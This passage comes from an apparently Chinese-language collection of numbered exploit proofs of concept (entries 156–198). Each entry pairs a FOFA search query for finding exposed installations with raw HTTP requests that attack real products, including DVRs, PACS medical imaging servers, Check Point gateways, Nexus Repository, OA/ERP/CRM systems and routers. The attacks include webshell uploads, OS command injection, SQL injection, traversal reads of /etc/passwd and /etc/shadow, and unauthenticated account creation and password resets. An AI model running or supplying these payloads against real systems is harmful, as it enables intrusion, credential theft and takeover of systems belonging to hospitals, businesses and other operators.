User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system (PACS) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>...</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 Smart Parking Fee System Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 Multimedia Information Publishing System QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 Distribution Management System ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易) Management System FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 Ticketing Management Platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 (Lean Value Management System) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 Vehicle Positioning and Monitoring Platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera (DT-高清车牌识别摄像机) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom Gateway Configuration Management System rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C Campus Network Self-Service System flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 Engineering Management System arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 Enterprise Standardization Management System UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 Enterprise Standardization Management System AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 Library Cluster Management System (Interlib) updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus Gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56');

185. 瑞友天翼 Application Virtualization System SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation installations.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 Video Conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 (LANWON clinical viewing system) deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

